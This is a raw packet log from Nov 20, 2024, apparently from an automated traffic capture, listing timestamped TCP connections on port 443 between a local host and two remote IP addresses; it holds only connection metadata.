                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884603977 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884610891 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884684086 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884691954 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.884716034 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.887079000 CET49760443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.887101889 CET44349760104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.889224052 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.889275074 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.889336109 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.889586926 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.889600039 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.973850012 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.973939896 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.973974943 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974004984 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974040985 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974066019 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974070072 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974070072 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974088907 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.974651098 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.983457088 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.984260082 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.991934061 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:37.998539925 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.001188040 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.001194954 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.043876886 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.094105005 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138149977 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138300896 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138396025 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138428926 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138446093 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138461113 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138488054 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.138494968 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.146872997 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.146907091 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.146919966 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.146930933 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.146965027 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155118942 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155216932 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155282021 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155287981 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155415058 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155652046 CET49765443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.155667067 CET44349765104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.158952951 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.159008980 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.159089088 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.159341097 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.159364939 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.161684036 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.161715031 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.161823988 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.162059069 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.162070036 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.177632093 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.177762032 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.178138018 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.178374052 CET49763443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.178385019 CET44349763104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201662064 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201724052 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201750040 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201776981 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201782942 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201796055 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201836109 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201843023 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201868057 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.201956987 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.220441103 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.220511913 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.220710993 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221137047 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221165895 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221244097 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221267939 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221316099 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221330881 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221563101 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221592903 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221735954 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.221745968 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.222127914 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.222138882 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.222683907 CET49764443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.222697020 CET44349764104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.225227118 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.225255966 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.225323915 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.225573063 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.225584984 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.228547096 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.228579998 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.228674889 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.228893995 CET49776443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.228905916 CET44349776104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.244954109 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245040894 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245080948 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245094061 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245105028 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245136023 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245136976 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245145082 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.245189905 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.246707916 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.255198002 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.255255938 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.255264044 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.263688087 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.263753891 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.263765097 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.308175087 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.367536068 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.418442011 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.418457985 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.451031923 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.451071978 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.451088905 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.451102972 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.451150894 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.457274914 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.465514898 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.465646029 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.465652943 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.473227978 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.473289013 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.473299026 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.484939098 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.484983921 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.484993935 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.497972965 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.498004913 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.498028040 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.498040915 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.498085022 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.506350994 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.512902021 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.512949944 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.512959003 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.519519091 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.519576073 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.519582987 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.526129961 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.526360035 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.526369095 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.532814980 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.532869101 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.532876968 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.539603949 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.539726019 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.539732933 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.590470076 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.647584915 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.649915934 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.649961948 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.649974108 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.659529924 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.659539938 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.659595966 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.659606934 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.671322107 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.671411991 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.671420097 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.671459913 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.676948071 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.676955938 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.677002907 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.681408882 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.681420088 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.681464911 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.689953089 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.689960957 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.690012932 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.698498011 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.698504925 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.698559046 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702637911 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702692986 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702697992 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702728033 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702775002 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702958107 CET49766443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.702972889 CET44349766104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.706893921 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.706928015 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.707089901 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.707329988 CET49777443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.707343102 CET44349777104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.708132982 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.708178997 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.708239079 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.708419085 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:38.708451986 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.134546041 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.134809017 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.134836912 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.135179996 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.135577917 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.135644913 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.135730028 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.154747009 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155035019 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155069113 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155427933 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155822039 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155893087 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.155981064 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.179338932 CET44349767104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.183706045 CET49767443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.198929071 CET49768443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.198966026 CET44349768104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.429560900 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.429826975 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.429848909 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.430907965 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.431107998 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.431483984 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.431483984 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.431504011 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.431555033 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.440844059 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.441080093 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.441096067 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.442203999 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.442282915 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.442574024 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.442645073 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.442703009 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.443398952 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.443598032 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.443618059 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.444001913 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.444375992 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.444443941 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.444479942 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.479597092 CET49770443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.479619980 CET44349770104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.483345032 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.487330914 CET44349771104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.487498999 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.487792969 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.487811089 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.488859892 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.488925934 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.489326000 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.489389896 CET44349772104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.489470959 CET49772443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.494307041 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.494579077 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.494590998 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.494934082 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.495192051 CET49775443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.495193005 CET49771443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.495207071 CET44349775104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.496026993 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:39.496084929 CET44349773104.16.102.112192.168.2.12
